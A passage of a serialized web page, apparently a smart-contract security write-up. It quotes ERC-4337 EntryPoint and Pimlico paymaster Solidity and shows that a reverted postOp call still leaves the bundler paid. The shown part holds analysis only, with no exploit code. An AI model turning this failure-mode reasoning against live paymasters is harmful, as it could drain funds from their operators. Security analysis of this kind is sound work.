IPaymaster.PostOpMode.opSucceeded;\n",{"type":24,"tag":301,"props":112501,"children":112502},{"class":303,"line":447},[112503,112507,112512,112516,112520],{"type":24,"tag":301,"props":112504,"children":112505},{"style":308},[112506],{"type":30,"value":3285},{"type":24,"tag":301,"props":112508,"children":112509},{"style":359},[112510],{"type":30,"value":112511}," (callData.length ",{"type":24,"tag":301,"props":112513,"children":112514},{"style":385},[112515],{"type":30,"value":1456},{"type":24,"tag":301,"props":112517,"children":112518},{"style":466},[112519],{"type":30,"value":685},{"type":24,"tag":301,"props":112521,"children":112522},{"style":359},[112523],{"type":30,"value":398},{"type":24,"tag":301,"props":112525,"children":112526},{"class":303,"line":476},[112527,112532,112537,112541,112546,112550,112555,112559],{"type":24,"tag":301,"props":112528,"children":112529},{"style":10246},[112530],{"type":30,"value":112531}," bool",{"type":24,"tag":301,"props":112533,"children":112534},{"style":359},[112535],{"type":30,"value":112536}," success ",{"type":24,"tag":301,"props":112538,"children":112539},{"style":385},[112540],{"type":30,"value":523},{"type":24,"tag":301,"props":112542,"children":112543},{"style":359},[112544],{"type":30,"value":112545}," Exec.",{"type":24,"tag":301,"props":112547,"children":112548},{"style":314},[112549],{"type":30,"value":45035},{"type":24,"tag":301,"props":112551,"children":112552},{"style":359},[112553],{"type":30,"value":112554},"(mUserOp.sender, ",{"type":24,"tag":301,"props":112556,"children":112557},{"style":466},[112558],{"type":30,"value":584},{"type":24,"tag":301,"props":112560,"children":112561},{"style":359},[112562],{"type":30,"value":112563},", callData, callGasLimit);\n",{"type":24,"tag":301,"props":112565,"children":112566},{"class":303,"line":495},[112567,112571,112575,112579],{"type":24,"tag":301,"props":112568,"children":112569},{"style":308},[112570],{"type":30,"value":65516},{"type":24,"tag":301,"props":112572,"children":112573},{"style":359},[112574],{"type":30,"value":873},{"type":24,"tag":301,"props":112576,"children":112577},{"style":385},[112578],{"type":30,"value":2485},{"type":24,"tag":301,"props":112580,"children":112581},{"style":359},[112582],{"type":30,"value":111867},{"type":24,"tag":301,"props":112584,"children":112585},{"class":303,"line":504},[112586,112590,112595,112599,112604],{"type":24,"tag":301,"props":112587,"children":112588},{"style":10246},[112589],{"type":30,"value":110154},{"type":24,"tag":301,"props":112591,"children":112592},{"style":359},[112593],{"type":30,"value":112594}," freePtr ",{"type":24,"tag":301,"props":112596,"children":112597},{"style":385},[112598],{"type":30,"value":523},{"type":24,"tag":301,"props":112600,"children":112601},{"style":314},[112602],{"type":30,"value":112603}," _getFreePtr",{"type":24,"tag":301,"props":112605,"children":112606},{"style":359},[112607],{"type":30,"value":4859},{"type":24,"tag":301,"props":112609,"children":112610},{"class":303,"line":512},[112611,112615,112619,112624,112628,112632,112637],{"type":24,"tag":301,"props":112612,"children":112613},{"style":10246},[112614],{"type":30,"value":111551},{"type":24,"tag":301,"props":112616,"children":112617},{"style":348},[112618],{"type":30,"value":109774},{"type":24,"tag":301,"props":112620,"children":112621},{"style":359},[112622],{"type":30,"value":112623}," result ",{"type":24,"tag":301,"props":112625,"children":112626},{"style":385},[112627],{"type":30,"value":523},{"type":24,"tag":301,"props":112629,"children":112630},{"style":359},[112631],{"type":30,"value":112545},{"type":24,"tag":301,"props":112633,"children":112634},{"style":314},[112635],{"type":30,"value":112636},"getReturnData",{"type":24,"tag":301,"props":112638,"children":112639},{"style":359},[112640],{"type":30,"value":112641},"(REVERT_REASON_MAX_LEN);\n",{"type":24,"tag":301,"props":112643,"children":112644},{"class":303,"line":592},[112645,112649,112654,112658,112662],{"type":24,"tag":301,"props":112646,"children":112647},{"style":308},[112648],{"type":30,"value":110214},{"type":24,"tag":301,"props":112650,"children":112651},{"style":359},[112652],{"type":30,"value":112653}," (result.length ",{"type":24,"tag":301,"props":112655,"children":112656},{"style":385},[112657],{"type":30,"value":1456},{"type":24,"tag":301,"props":112659,"children":112660},{"style":466},[112661],{"type":30,"value":685},{"type":24,"tag":301,"props":112663,"children":112664},{"style":359},[112665],{"type":30,"value":398},{"type":24,"tag":301,"props":112667,"children":112668},{"class":303,"line":619},[112669,112674,112679],{"type":24,"tag":301,"props":112670,"children":112671},{"style":308},[112672],{"type":30,"value":112673}," emit",{"type":24,"tag":301,"props":112675,"children":112676},{"style":314},[112677],{"type":30,"value":112678}," UserOperationRevertReason",{"type":24,"tag":301,"props":112680,"children":112681},{"style":359},[112682],{"type":30,"value":1707},{"type":24,"tag":301,"props":112684,"children":112685},{"class":303,"line":635},[112686],{"type":24,"tag":301,"props":112687,"children":112688},{"style":359},[112689],{"type":30,"value":112690}," opInfo.userOpHash,\n",{"type":24,"tag":301,"props":112692,"children":112693},{"class":303,"line":643},[112694],{"type":24,"tag":301,"props":112695,"children":112696},{"style":359},[112697],{"type":30,"value":112698}," mUserOp.sender,\n",{"type":24,"tag":301,"props":112700,"children":112701},{"class":303,"line":652},[112702],{"type":24,"tag":301,"props":112703,"children":112704},{"style":359},[112705],{"type":30,"value":112706}," mUserOp.nonce,\n",{"type":24,"tag":301,"props":112708,"children":112709},{"class":303,"line":666},[112710],{"type":24,"tag":301,"props":112711,"children":112712},{"style":359},[112713],{"type":30,"value":112714}," result\n",{"type":24,"tag":301,"props":112716,"children":112717},{"class":303,"line":674},[112718],{"type":24,"tag":301,"props":112719,"children":112720},{"style":359},[112721],{"type":30,"value":112722}," );\n",{"type":24,"tag":301,"props":112724,"children":112725},{"class":303,"line":692},[112726],{"type":24,"tag":301,"props":112727,"children":112728},{"style":359},[112729],{"type":30,"value":4211},{"type":24,"tag":301,"props":112731,"children":112732},{"class":303,"line":3631},[112733,112738],{"type":24,"tag":301,"props":112734,"children":112735},{"style":314},[112736],{"type":30,"value":112737}," _restoreFreePtr",{"type":24,"tag":301,"props":112739,"children":112740},{"style":359},[112741],{"type":30,"value":112742},"(freePtr);\n",{"type":24,"tag":301,"props":112744,"children":112745},{"class":303,"line":3639},[112746,112751,112755],{"type":24,"tag":301,"props":112747,"children":112748},{"style":359},[112749],{"type":30,"value":112750}," mode ",{"type":24,"tag":301,"props":112752,"children":112753},{"style":385},[112754],{"type":30,"value":523},{"type":24,"tag":301,"props":112756,"children":112757},{"style":359},[112758],{"type":30,"value":112759}," IPaymaster.PostOpMode.opReverted;\n",{"type":24,"tag":301,"props":112761,"children":112762},{"class":303,"line":3647},[112763],{"type":24,"tag":301,"props":112764,"children":112765},{"style":359},[112766],{"type":30,"value":65600},{"type":24,"tag":301,"props":112768,"children":112769},{"class":303,"line":3685},[112770],{"type":24,"tag":301,"props":112771,"children":112772},{"style":359},[112773],{"type":30,"value":3345},{"type":24,"tag":301,"props":112775,"children":112776},{"class":303,"line":3713},[112777],{"type":24,"tag":301,"props":112778,"children":112779},{"emptyLinePlaceholder":16},[112780],{"type":30,"value":341},{"type":24,"tag":301,"props":112782,"children":112783},{"class":303,"line":3721},[112784,112788],{"type":24,"tag":301,"props":112785,"children":112786},{"style":308},[112787],{"type":30,"value":109810},{"type":24,"tag":301,"props":112789,"children":112790},{"style":359},[112791],{"type":30,"value":3035},{"type":24,"tag":301,"props":112793,"children":112794},{"class":303,"line":3751},[112795,112799,112803,112807,112811,112815,112819,112823,112827],{"type":24,"tag":301,"props":112796,"children":112797},{"style":10246},[112798],{"type":30,"value":109822},{"type":24,"tag":301,"props":112800,"children":112801},{"style":359},[112802],{"type":30,"value":111986},{"type":24,"tag":301,"props":112804,"children":112805},{"style":385},[112806],{"type":30,"value":523},{"type":24,"tag":301,"props":112808,"children":112809},{"style":359},[112810],{"type":30,"value":111995},{"type":24,"tag":301,"props":112812,"children":112813},{"style":385},[112814],{"type":30,"value":9253},{"type":24,"tag":301,"props":112816,"children":112817},{"style":348},[112818],{"type":30,"value":112004},{"type":24,"tag":301,"props":112820,"children":112821},{"style":359},[112822],{"type":30,"value":20835},{"type":24,"tag":301,"props":112824,"children":112825},{"style":385},[112826],{"type":30,"value":11206},{"type":24,"tag":301,"props":112828,"children":112829},{"style":359},[112830],{"type":30,"value":112017},{"type":24,"tag":301,"props":112832,"children":112833},{"class":303,"line":3782},[112834,112838,112842],{"type":24,"tag":301,"props":112835,"children":112836},{"style":308},[112837],{"type":30,"value":85788},{"type":24,"tag":301,"props":112839,"children":112840},{"style":314},[112841],{"type":30,"value":112126},{"type":24,"tag":301,"props":112843,"children":112844},{"style":359},[112845],{"type":30,"value":112846},"(mode, opInfo, context, actualGas);\n",{"type":24,"tag":301,"props":112848,"children":112849},{"class":303,"line":3791},[112850],{"type":24,"tag":301,"props":112851,"children":112852},{"style":359},[112853],{"type":30,"value":3345},{"type":24,"tag":301,"props":112855,"children":112856},{"class":303,"line":3819},[112857],{"type":24,"tag":301,"props":112858,"children":112859},{"style":359},[112860],{"type":30,"value":501},{"type":24,"tag":32,"props":112862,"children":112863},{},[112864,112866,112871,112873,112878,112880,112886,112888,112894,112896,112901,112903,112913],{"type":30,"value":112865},"We observe that, in the happy path, ",{"type":24,"tag":145,"props":112867,"children":112869},{"className":112868},[],[112870],{"type":30,"value":112217},{"type":30,"value":112872}," is expected to not only execute the actual ",{"type":24,"tag":145,"props":112874,"children":112876},{"className":112875},[],[112877],{"type":30,"value":108878},{"type":30,"value":112879}," call, but also call ",{"type":24,"tag":145,"props":112881,"children":112883},{"className":112882},[],[112884],{"type":30,"value":112885},"_postExecution",{"type":30,"value":112887},". This means that the third failure handling path, which passes ",{"type":24,"tag":145,"props":112889,"children":112891},{"className":112890},[],[112892],{"type":30,"value":112893},"postOpReverted",{"type":30,"value":112895}," as its mode, happens when something goes wrong with the ",{"type":24,"tag":145,"props":112897,"children":112899},{"className":112898},[],[112900],{"type":30,"value":112885},{"type":30,"value":112902}," call ",{"type":24,"tag":60,"props":112904,"children":112905},{},[112906,112908],{"type":30,"value":112907},"inside ",{"type":24,"tag":145,"props":112909,"children":112911},{"className":112910},[],[112912],{"type":30,"value":112217},{"type":30,"value":206},{"type":24,"tag":32,"props":112915,"children":112916},{},[112917,112919,112924],{"type":30,"value":112918},"Let's examine the ",{"type":24,"tag":145,"props":112920,"children":112922},{"className":112921},[],[112923],{"type":30,"value":112885},{"type":30,"value":112925}," code to understand where the revert might occur.",{"type":24,"tag":291,"props":112927,"children":112929},{"className":11300,"code":112928,"language":11299,"meta":7,"style":7}," function _postExecution(\n IPaymaster.PostOpMode mode,\n UserOpInfo memory opInfo,\n bytes memory context,\n uint256 actualGas\n ) internal virtual returns (uint256 actualGasCost) {\n [...]\n if (paymaster == address(0)) {\n refundAddress = mUserOp.sender;\n } else {\n refundAddress = paymaster;\n if (context.length > 0) {\n actualGasCost = actualGas * gasPrice;\n uint256 postOpPreGas = gasleft();\n if (mode != IPaymaster.PostOpMode.postOpReverted) {\n try IPaymaster(paymaster).postOp{\n gas: mUserOp.paymasterPostOpGasLimit\n }(mode, context, actualGasCost, gasPrice)\n // solhint-disable-next-line no-empty-blocks\n {} catch {\n bytes memory reason = Exec.getReturnData(REVERT_REASON_MAX_LEN);\n revert PostOpReverted(reason);\n }\n }\n // Calculating a penalty for unused postOp gas\n // note that if postOp is reverted, the maximum penalty (10% of postOpGasLimit) is charged.\n uint256 postOpGasUsed = postOpPreGas - gasleft();\n postOpUnusedGasPenalty = _getUnusedGasPenalty(postOpGasUsed, mUserOp.paymasterPostOpGasLimit);\n }\n }\n [...]\n }\n",[112930],{"type":24,"tag":145,"props":112931,"children":112932},{"__ignoreMap":7},[112933,112948,112973,112992,113011,113023,113060,113067,113099,113116,113131,113147,113171,113196,113220,113242,113260,113277,113285,113303,113319,113352,113370,113377,113384,113392,113408,113440,113462,113469,113476,113483],{"type":24,"tag":301,"props":112934,"children":112935},{"class":303,"line":304},[112936,112940,112944],{"type":24,"tag":301,"props":112937,"children":112938},{"style":348},[112939],{"type":30,"value":96533},{"type":24,"tag":301,"props":112941,"children":112942},{"style":314},[112943],{"type":30,"value":112126},{"type":24,"tag":301,"props":112945,"children":112946},{"style":359},[112947],{"type":30,"value":1707},{"type":24,"tag":301,"props":112949,"children":112950},{"class":303,"line":320},[112951,112956,112960,112964,112969],{"type":24,"tag":301,"props":112952,"children":112953},{"style":348},[112954],{"type":30,"value":112955}," IPaymaster",{"type":24,"tag":301,"props":112957,"children":112958},{"style":359},[112959],{"type":30,"value":206},{"type":24,"tag":301,"props":112961,"children":112962},{"style":369},[112963],{"type":30,"value":110486},{"type":24,"tag":301,"props":112965,"children":112966},{"style":369},[112967],{"type":30,"value":112968}," mode",{"type":24,"tag":301,"props":112970,"children":112971},{"style":359},[112972],{"type":30,"value":1729},{"type":24,"tag":301,"props":112974,"children":112975},{"class":303,"line":335},[112976,112980,112984,112988],{"type":24,"tag":301,"props":112977,"children":112978},{"style":348},[112979],{"type":30,"value":111434},{"type":24,"tag":301,"props":112981,"children":112982},{"style":348},[112983],{"type":30,"value":109774},{"type":24,"tag":301,"props":112985,"children":112986},{"style":369},[112987],{"type":30,"value":112422},{"type":24,"tag":301,"props":112989,"children":112990},{"style":359},[112991],{"type":30,"value":1729},{"type":24,"tag":301,"props":112993,"children":112994},{"class":303,"line":344},[112995,112999,113003,113007],{"type":24,"tag":301,"props":112996,"children":112997},{"style":10246},[112998],{"type":30,"value":112393},{"type":24,"tag":301,"props":113000,"children":113001},{"style":348},[113002],{"type":30,"value":109774},{"type":24,"tag":301,"props":113004,"children":113005},{"style":369},[113006],{"type":30,"value":83053},{"type":24,"tag":301,"props":113008,"children":113009},{"style":359},[113010],{"type":30,"value":1729},{"type":24,"tag":301,"props":113012,"children":113013},{"class":303,"line":401},[113014,113018],{"type":24,"tag":301,"props":113015,"children":113016},{"style":10246},[113017],{"type":30,"value":96710},{"type":24,"tag":301,"props":113019,"children":113020},{"style":369},[113021],{"type":30,"value":113022}," actualGas\n",{"type":24,"tag":301,"props":113024,"children":113025},{"class":303,"line":415},[113026,113030,113035,113040,113044,113048,113052,113056],{"type":24,"tag":301,"props":113027,"children":113028},{"style":359},[113029],{"type":30,"value":112450},{"type":24,"tag":301,"props":113031,"children":113032},{"style":348},[113033],{"type":30,"value":113034},"internal",{"type":24,"tag":301,"props":113036,"children":113037},{"style":348},[113038],{"type":30,"value":113039}," virtual",{"type":24,"tag":301,"props":113041,"children":113042},{"style":308},[113043],{"type":30,"value":82706},{"type":24,"tag":301,"props":113045,"children":113046},{"style":359},[113047],{"type":30,"value":873},{"type":24,"tag":301,"props":113049,"children":113050},{"style":10246},[113051],{"type":30,"value":52904},{"type":24,"tag":301,"props":113053,"children":113054},{"style":369},[113055],{"type":30,"value":110515},{"type":24,"tag":301,"props":113057,"children":113058},{"style":359},[113059],{"type":30,"value":398},{"type":24,"tag":301,"props":113061,"children":113062},{"class":303,"line":439},[113063],{"type":24,"tag":301,"props":113064,"children":113065},{"style":359},[113066],{"type":30,"value":111495},{"type":24,"tag":301,"props":113068,"children":113069},{"class":303,"line":447},[113070,113074,113079,113083,113087,113091,113095],{"type":24,"tag":301,"props":113071,"children":113072},{"style":308},[113073],{"type":30,"value":65516},{"type":24,"tag":301,"props":113075,"children":113076},{"style":359},[113077],{"type":30,"value":113078}," (paymaster ",{"type":24,"tag":301,"props":113080,"children":113081},{"style":385},[113082],{"type":30,"value":607},{"type":24,"tag":301,"props":113084,"children":113085},{"style":10246},[113086],{"type":30,"value":13069},{"type":24,"tag":301,"props":113088,"children":113089},{"style":359},[113090],{"type":30,"value":362},{"type":24,"tag":301,"props":113092,"children":113093},{"style":466},[113094],{"type":30,"value":584},{"type":24,"tag":301,"props":113096,"children":113097},{"style":359},[113098],{"type":30,"value":41941},{"type":24,"tag":301,"props":113100,"children":113101},{"class":303,"line":476},[113102,113107,113111],{"type":24,"tag":301,"props":113103,"children":113104},{"style":359},[113105],{"type":30,"value":113106}," refundAddress ",{"type":24,"tag":301,"props":113108,"children":113109},{"style":385},[113110],{"type":30,"value":523},{"type":24,"tag":301,"props":113112,"children":113113},{"style":359},[113114],{"type":30,"value":113115}," mUserOp.sender;\n",{"type":24,"tag":301,"props":113117,"children":113118},{"class":303,"line":495},[113119,113123,113127],{"type":24,"tag":301,"props":113120,"children":113121},{"style":359},[113122],{"type":30,"value":77307},{"type":24,"tag":301,"props":113124,"children":113125},{"style":308},[113126],{"type":30,"value":10144},{"type":24,"tag":301,"props":113128,"children":113129},{"style":359},[113130],{"type":30,"value":3035},{"type":24,"tag":301,"props":113132,"children":113133},{"class":303,"line":504},[113134,113138,113142],{"type":24,"tag":301,"props":113135,"children":113136},{"style":359},[113137],{"type":30,"value":113106},{"type":24,"tag":301,"props":113139,"children":113140},{"style":385},[113141],{"type":30,"value":523},{"type":24,"tag":301,"props":113143,"children":113144},{"style":359},[113145],{"type":30,"value":113146}," paymaster;\n",{"type":24,"tag":301,"props":113148,"children":113149},{"class":303,"line":512},[113150,113154,113159,113163,113167],{"type":24,"tag":301,"props":113151,"children":113152},{"style":308},[113153],{"type":30,"value":110214},{"type":24,"tag":301,"props":113155,"children":113156},{"style":359},[113157],{"type":30,"value":113158}," (context.length ",{"type":24,"tag":301,"props":113160,"children":113161},{"style":385},[113162],{"type":30,"value":1456},{"type":24,"tag":301,"props":113164,"children":113165},{"style":466},[113166],{"type":30,"value":685},{"type":24,"tag":301,"props":113168,"children":113169},{"style":359},[113170],{"type":30,"value":398},{"type":24,"tag":301,"props":113172,"children":113173},{"class":303,"line":592},[113174,113179,113183,113187,113191],{"type":24,"tag":301,"props":113175,"children":113176},{"style":359},[113177],{"type":30,"value":113178}," actualGasCost ",{"type":24,"tag":301,"props":113180,"children":113181},{"style":385},[113182],{"type":30,"value":523},{"type":24,"tag":301,"props":113184,"children":113185},{"style":359},[113186],{"type":30,"value":111986},{"type":24,"tag":301,"props":113188,"children":113189},{"style":385},[113190],{"type":30,"value":772},{"type":24,"tag":301,"props":113192,"children":113193},{"style":359},[113194],{"type":30,"value":113195}," gasPrice;\n",{"type":24,"tag":301,"props":113197,"children":113198},{"class":303,"line":619},[113199,113203,113208,113212,113216],{"type":24,"tag":301,"props":113200,"children":113201},{"style":10246},[113202],{"type":30,"value":110171},{"type":24,"tag":301,"props":113204,"children":113205},{"style":359},[113206],{"type":30,"value":113207}," postOpPreGas ",{"type":24,"tag":301,"props":113209,"children":113210},{"style":385},[113211],{"type":30,"value":523},{"type":24,"tag":301,"props":113213,"children":113214},{"style":348},[113215],{"type":30,"value":112004},{"type":24,"tag":301,"props":113217,"children":113218},{"style":359},[113219],{"type":30,"value":4859},{"type":24,"tag":301,"props":113221,"children":113222},{"class":303,"line":635},[113223,113228,113233,113237],{"type":24,"tag":301,"props":113224,"children":113225},{"style":308},[113226],{"type":30,"value":113227}," if",{"type":24,"tag":301,"props":113229,"children":113230},{"style":359},[113231],{"type":30,"value":113232}," (mode ",{"type":24,"tag":301,"props":113234,"children":113235},{"style":385},[113236],{"type":30,"value":463},{"type":24,"tag":301,"props":113238,"children":113239},{"style":359},[113240],{"type":30,"value":113241}," IPaymaster.PostOpMode.postOpReverted) {\n",{"type":24,"tag":301,"props":113243,"children":113244},{"class":303,"line":643},[113245,113250,113255],{"type":24,"tag":301,"props":113246,"children":113247},{"style":308},[113248],{"type":30,"value":113249}," try",{"type":24,"tag":301,"props":113251,"children":113252},{"style":314},[113253],{"type":30,"value":113254}," IPaymaster",{"type":24,"tag":301,"props":113256,"children":113257},{"style":359},[113258],{"type":30,"value":113259},"(paymaster).postOp{\n",{"type":24,"tag":301,"props":113261,"children":113262},{"class":303,"line":652},[113263,113268,113272],{"type":24,"tag":301,"props":113264,"children":113265},{"style":359},[113266],{"type":30,"value":113267}," gas",{"type":24,"tag":301,"props":113269,"children":113270},{"style":385},[113271],{"type":30,"value":1679},{"type":24,"tag":301,"props":113273,"children":113274},{"style":359},[113275],{"type":30,"value":113276}," mUserOp.paymasterPostOpGasLimit\n",{"type":24,"tag":301,"props":113278,"children":113279},{"class":303,"line":666},[113280],{"type":24,"tag":301,"props":113281,"children":113282},{"style":359},[113283],{"type":30,"value":113284}," }(mode, context, actualGasCost, gasPrice)\n",{"type":24,"tag":301,"props":113286,"children":113287},{"class":303,"line":674},[113288,113293,113298],{"type":24,"tag":301,"props":113289,"children":113290},{"style":1062},[113291],{"type":30,"value":113292}," // ",{"type":24,"tag":301,"props":113294,"children":113295},{"style":348},[113296],{"type":30,"value":113297},"solhint-disable",{"type":24,"tag":301,"props":113299,"children":113300},{"style":1062},[113301],{"type":30,"value":113302},"-next-line no-empty-blocks\n",{"type":24,"tag":301,"props":113304,"children":113305},{"class":303,"line":692},[113306,113311,113315],{"type":24,"tag":301,"props":113307,"children":113308},{"style":359},[113309],{"type":30,"value":113310}," {} ",{"type":24,"tag":301,"props":113312,"children":113313},{"style":308},[113314],{"type":30,"value":55146},{"type":24,"tag":301,"props":113316,"children":113317},{"style":359},[113318],{"type":30,"value":3035},{"type":24,"tag":301,"props":113320,"children":113321},{"class":303,"line":3631},[113322,113327,113331,113336,113340,113344,113348],{"type":24,"tag":301,"props":113323,"children":113324},{"style":10246},[113325],{"type":30,"value":113326}," bytes",{"type":24,"tag":301,"props":113328,"children":113329},{"style":348},[113330],{"type":30,"value":109774},{"type":24,"tag":301,"props":113332,"children":113333},{"style":359},[113334],{"type":30,"value":113335}," reason ",{"type":24,"tag":301,"props":113337,"children":113338},{"style":385},[113339],{"type":30,"value":523},{"type":24,"tag":301,"props":113341,"children":113342},{"style":359},[113343],{"type":30,"value":112545},{"type":24,"tag":301,"props":113345,"children":113346},{"style":314},[113347],{"type":30,"value":112636},{"type":24,"tag":301,"props":113349,"children":113350},{"style":359},[113351],{"type":30,"value":112641},{"type":24,"tag":301,"props":113353,"children":113354},{"class":303,"line":3639},[113355,113360,113365],{"type":24,"tag":301,"props":113356,"children":113357},{"style":308},[113358],{"type":30,"value":113359}," revert",{"type":24,"tag":301,"props":113361,"children":113362},{"style":314},[113363],{"type":30,"value":113364}," PostOpReverted",{"type":24,"tag":301,"props":113366,"children":113367},{"style":359},[113368],{"type":30,"value":113369},"(reason);\n",{"type":24,"tag":301,"props":113371,"children":113372},{"class":303,"line":3647},[113373],{"type":24,"tag":301,"props":113374,"children":113375},{"style":359},[113376],{"type":30,"value":77691},{"type":24,"tag":301,"props":113378,"children":113379},{"class":303,"line":3685},[113380],{"type":24,"tag":301,"props":113381,"children":113382},{"style":359},[113383],{"type":30,"value":77776},{"type":24,"tag":301,"props":113385,"children":113386},{"class":303,"line":3713},[113387],{"type":24,"tag":301,"props":113388,"children":113389},{"style":1062},[113390],{"type":30,"value":113391}," // Calculating a penalty for unused postOp gas\n",{"type":24,"tag":301,"props":113393,"children":113394},{"class":303,"line":3721},[113395,113399,113403],{"type":24,"tag":301,"props":113396,"children":113397},{"style":1062},[113398],{"type":30,"value":110236},{"type":24,"tag":301,"props":113400,"children":113401},{"style":348},[113402],{"type":30,"value":73471},{"type":24,"tag":301,"props":113404,"children":113405},{"style":1062},[113406],{"type":30,"value":113407}," that if postOp is reverted, the maximum penalty (10% of postOpGasLimit) is charged.\n",{"type":24,"tag":301,"props":113409,"children":113410},{"class":303,"line":3751},[113411,113415,113420,113424,113428,113432,113436],{"type":24,"tag":301,"props":113412,"children":113413},{"style":10246},[113414],{"type":30,"value":110171},{"type":24,"tag":301,"props":113416,"children":113417},{"style":359},[113418],{"type":30,"value":113419}," postOpGasUsed ",{"type":24,"tag":301,"props":113421,"children":113422},{"style":385},[113423],{"type":30,"value":523},{"type":24,"tag":301,"props":113425,"children":113426},{"style":359},[113427],{"type":30,"value":113207},{"type":24,"tag":301,"props":113429,"children":113430},{"style":385},[113431],{"type":30,"value":9253},{"type":24,"tag":301,"props":113433,"children":113434},{"style":348},[113435],{"type":30,"value":112004},{"type":24,"tag":301,"props":113437,"children":113438},{"style":359},[113439],{"type":30,"value":4859},{"type":24,"tag":301,"props":113441,"children":113442},{"class":303,"line":3782},[113443,113448,113452,113457],{"type":24,"tag":301,"props":113444,"children":113445},{"style":359},[113446],{"type":30,"value":113447}," postOpUnusedGasPenalty ",{"type":24,"tag":301,"props":113449,"children":113450},{"style":385},[113451],{"type":30,"value":523},{"type":24,"tag":301,"props":113453,"children":113454},{"style":314},[113455],{"type":30,"value":113456}," _getUnusedGasPenalty",{"type":24,"tag":301,"props":113458,"children":113459},{"style":359},[113460],{"type":30,"value":113461},"(postOpGasUsed, mUserOp.paymasterPostOpGasLimit);\n",{"type":24,"tag":301,"props":113463,"children":113464},{"class":303,"line":3791},[113465],{"type":24,"tag":301,"props":113466,"children":113467},{"style":359},[113468],{"type":30,"value":4211},{"type":24,"tag":301,"props":113470,"children":113471},{"class":303,"line":3819},[113472],{"type":24,"tag":301,"props":113473,"children":113474},{"style":359},[113475],{"type":30,"value":65600},{"type":24,"tag":301,"props":113477,"children":113478},{"class":303,"line":4397},[113479],{"type":24,"tag":301,"props":113480,"children":113481},{"style":359},[113482],{"type":30,"value":111495},{"type":24,"tag":301,"props":113484,"children":113485},{"class":303,"line":4405},[113486],{"type":24,"tag":301,"props":113487,"children":113488},{"style":359},[113489],{"type":30,"value":501},{"type":24,"tag":32,"props":113491,"children":113492},{},[113493,113495,113500,113502,113508,113510,113516,113518,113523,113525,113530,113532,113537,113539,113544,113546,113551,113553,113558],{"type":30,"value":113494},"It turns out that if the ",{"type":24,"tag":145,"props":113496,"children":113498},{"className":113497},[],[113499],{"type":30,"value":109075},{"type":30,"value":113501}," call fails, it will revert with ",{"type":24,"tag":145,"props":113503,"children":113505},{"className":113504},[],[113506],{"type":30,"value":113507},"PostOpReverted",{"type":30,"value":113509},". However, as we can see in the previous code of ",{"type":24,"tag":145,"props":113511,"children":113513},{"className":113512},[],[113514],{"type":30,"value":113515},"_executeUserOp",{"type":30,"value":113517},", even though ",{"type":24,"tag":145,"props":113519,"children":113521},{"className":113520},[],[113522],{"type":30,"value":112217},{"type":30,"value":113524}," fails, the execution won't revert. Instead, it will continue to make another ",{"type":24,"tag":145,"props":113526,"children":113528},{"className":113527},[],[113529],{"type":30,"value":112885},{"type":30,"value":113531}," call with ",{"type":24,"tag":145,"props":113533,"children":113535},{"className":113534},[],[113536],{"type":30,"value":112893},{"type":30,"value":113538}," mode, and it won't try to call ",{"type":24,"tag":145,"props":113540,"children":113542},{"className":113541},[],[113543],{"type":30,"value":109075},{"type":30,"value":113545}," again. This means the ",{"type":24,"tag":145,"props":113547,"children":113549},{"className":113548},[],[113550],{"type":30,"value":108938},{"type":30,"value":113552}," still gets paid for submitting the failed ",{"type":24,"tag":145,"props":113554,"children":113556},{"className":113555},[],[113557],{"type":30,"value":108878},{"type":30,"value":206},{"type":24,"tag":32,"props":113560,"children":113561},{},[113562,113564,113569,113571,113576,113578,113585],{"type":30,"value":113563},"Now that we understand this behavior where ",{"type":24,"tag":145,"props":113565,"children":113567},{"className":113566},[],[113568],{"type":30,"value":109075},{"type":30,"value":113570}," is allowed to fail while the ",{"type":24,"tag":145,"props":113572,"children":113574},{"className":113573},[],[113575],{"type":30,"value":108938},{"type":30,"value":113577}," still gets paid, let's examine a real-world example from the most widely used paymaster currently, which is the paymaster implemented by ",{"type":24,"tag":188,"props":113579,"children":113582},{"href":113580,"rel":113581},"https://github.com/pimlicolabs/singleton-paymaster/blob/feat/v8/src/SingletonPaymasterV7.sol",[192],[113583],{"type":30,"value":113584},"Pimlico",{"type":30,"value":206},{"type":24,"tag":291,"props":113587,"children":113589},{"className":11300,"code":113588,"language":11299,"meta":7,"style":7}," function _postOp(\n PostOpMode, /* mode */\n bytes calldata _context,\n uint256 _actualGasCost,\n uint256 _actualUserOpFeePerGas\n )\n internal\n {\n ERC20PostOpContext memory ctx = _parsePostOpContext(_context);\n\n uint256 expectedPenaltyGasCost = _expectedPenaltyGasCost(\n _actualGasCost, _actualUserOpFeePerGas, ctx.postOpGas, ctx.preOpGasApproximation, ctx.executionGasLimit\n );\n\n uint256 actualGasCost = _actualGasCost + expectedPenaltyGasCost;\n\n uint256 costInToken =\n getCostInToken(actualGasCost, ctx.postOpGas, _actualUserOpFeePerGas, ctx.exchangeRate) + ctx.constantFee;\n\n uint256 absoluteCostInToken =\n costInToken > ctx.preFundCharged ? costInToken - ctx.preFundCharged : ctx.preFundCharged - costInToken;\n\n SafeTransferLib.safeTransferFrom(\n ctx.token,\n costInToken > ctx.preFundCharged ? ctx.sender : ctx.treasury,\n costInToken > ctx.preFundCharged ? ctx.treasury : ctx.sender,\n absoluteCostInToken\n );\n\n uint256 preFundInToken = (ctx.preFund * ctx.exchangeRate) / 1e18;\n\n if (ctx.recipient != address(0) && preFundInToken > costInToken) {\n SafeTransferLib.safeTransferFrom(ctx.token, ctx.sender, ctx.recipient, preFundInToken - costInToken);\n }\n\n emit UserOperationSponsored(ctx.userOpHash, ctx.sender, ERC20_MODE, ctx.token, costInToken, ctx.exchangeRate);\n }\n",[113590],{"type":24,"tag":145,"props":113591,"children":113592},{"__ignoreMap":7},[113593,113608,113625,113645,113661,113673,113680,113687,113694,113725,113732,113757,113765,113772,113779,113808,113815,113831,113853,113860,113876,113926,113933,113949,113957,113990,114023,114031,114038,114045,114088,114095,114144,114170,114177,114184,114201],{"type":24,"tag":301,"props":113594,"children":113595},{"class":303,"line":304},[113596,113600,113604],{"type":24,"tag":301,"props":113597,"children":113598},{"style":348},[113599],{"type":30,"value":96533},{"type":24,"tag":301,"props":113601,"children":113602},{"style":314},[113603],{"type":30,"value":110477},{"type":24,"tag":301,"props":113605,"children":113606},{"style":359},[113607],{"type":30,"value":1707},{"type":24,"tag":301,"props":113609,"children":113610},{"class":303,"line":320},[113611,113616,113620],{"type":24,"tag":301,"props":113612,"children":113613},{"style":348},[113614],{"type":30,"value":113615}," 